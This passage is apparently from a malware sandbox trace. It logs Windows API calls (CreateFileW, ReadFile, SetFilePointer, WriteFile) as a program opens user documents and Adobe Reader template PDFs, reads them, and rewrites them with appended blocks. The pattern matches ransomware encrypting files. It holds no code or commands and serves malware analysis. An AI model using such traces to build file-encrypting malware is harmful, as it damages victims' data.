lpUsedDefaultChar=0x0) returned 11 [0072.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g761Ga.xlsx", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g761Ga.xlsx", lpUsedDefaultChar=0x0) returned 11 [0072.373] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.375] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x13d9c [0072.375] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.375] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x13d9c [0072.375] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.377] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0072.377] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.377] CloseHandle (hObject=0x1d4) returned 1 [0072.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBtOB97D\\CdG9P-E-dZRUHR2Qk1.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtob97d\\cdg9p-e-dzruhr2qk1.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0072.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x943b [0072.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.378] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.378] ReleaseMutex (hMutex=0x168) returned 1 [0072.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CdG9P-E-dZRUHR2Qk1.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CdG9P-E-dZRUHR2Qk1.docx", cchWideChar=23, lpMultiByteStr=0x1f88a64, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CdG9P-E-dZRUHR2Qk1.docx", lpUsedDefaultChar=0x0) returned 23 [0072.378] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.380] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x843b [0072.380] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.380] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x843b [0072.380] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.380] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0072.381] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.381] CloseHandle (hObject=0x1d4) returned 1 [0072.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0072.383] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.383] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3fe4ab [0072.383] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.384] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.384] ReleaseMutex (hMutex=0x168) returned 1 [0072.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Built-In Building Blocks.dotx", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0072.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Built-In Building Blocks.dotx", cchWideChar=29, lpMultiByteStr=0x1f8feac, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Built-In Building Blocks.dotx", lpUsedDefaultChar=0x0) returned 29 [0072.384] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0072.387] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0072.388] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0072.391] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3fc4ab [0072.391] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0072.394] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3fc4ab [0072.395] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0072.395] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0072.396] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0072.396] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0072.396] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0072.397] CloseHandle (hObject=0x1d4) returned 1 [0072.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\o9qGHktC5Xd4LEDfp6I.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\o9qghktc5xd4ledfp6i.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0072.398] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.398] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x365e [0072.398] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.398] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.398] ReleaseMutex (hMutex=0x168) returned 1 [0072.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="o9qGHktC5Xd4LEDfp6I.ods", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="o9qGHktC5Xd4LEDfp6I.ods", cchWideChar=23, lpMultiByteStr=0x1f88a64, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o9qGHktC5Xd4LEDfp6I.ods", lpUsedDefaultChar=0x0) returned 23 [0072.398] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.400] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x265e [0072.400] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.400] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x265e [0072.400] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.400] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0072.400] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.400] CloseHandle (hObject=0x1d4) returned 1 [0072.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0072.403] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.403] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x155af [0072.403] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.403] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.403] ReleaseMutex (hMutex=0x168) returned 1 [0072.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0072.403] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.406] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x145af [0072.406] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.407] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x145af [0072.407] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.408] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0072.408] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.408] CloseHandle (hObject=0x1d4) returned 1 [0072.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0072.409] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.410] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x104bf [0072.410] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0072.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.410] ReleaseMutex (hMutex=0x168) returned 1 [0072.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0072.410] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.600] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf4bf [0073.601] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.601] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf4bf [0073.601] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.601] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.601] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.602] CloseHandle (hObject=0x1d4) returned 1 [0073.602] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x103f8 [0073.603] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.603] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.603] ReleaseMutex (hMutex=0x168) returned 1 [0073.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.604] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.606] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf3f8 [0073.606] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.606] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf3f8 [0073.607] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.607] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0073.607] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.607] CloseHandle (hObject=0x1d4) returned 1 [0073.608] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0073.608] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.608] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1043a [0073.608] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0073.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.609] ReleaseMutex (hMutex=0x168) returned 1 [0073.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0073.609] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.611] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf43a [0073.611] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.612] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 